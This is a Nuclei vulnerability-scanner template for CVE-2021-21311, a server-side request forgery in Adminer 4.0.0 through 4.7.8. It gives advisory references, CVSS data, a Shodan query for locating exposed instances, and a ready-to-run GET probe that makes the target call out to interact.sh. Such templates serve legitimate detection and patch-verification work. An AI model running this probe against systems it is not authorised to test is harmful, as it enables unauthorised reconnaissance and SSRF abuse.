nuclei-templates/cves/2021/CVE-2021-21311.yaml

41 lines
1.2 KiB
YAML

id: CVE-2021-21311
info:
name: Adminer <4.7.9 - Server-Side Request Forgery
author: Adam Crosser
severity: high
description: Adminer from version 4.0.0 through 4.7.8 is susceptible to server-side request forgery due to its use of verbose error messages. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.
reference:
- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
- https://packagist.org/packages/vrana/adminer
- https://nvd.nist.gov/vuln/detail/CVE-2021-21311
remediation: Upgrade to version 4.7.9 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2021-21311
cwe-id: CWE-918
metadata:
shodan-query: title:"Login - Adminer"
tags: cve,cve2021,adminer,ssrf
requests:
- method: GET
path:
- "{{BaseURL}}/adminer?elastic=interact.sh&username="
matchers-condition: and
matchers:
- type: word
part: body
words:
- "&lt;title&gt;400 - Bad Request&lt;/title&gt;"
- type: status
status:
- 403
# Enhanced by mp on 2022/06/27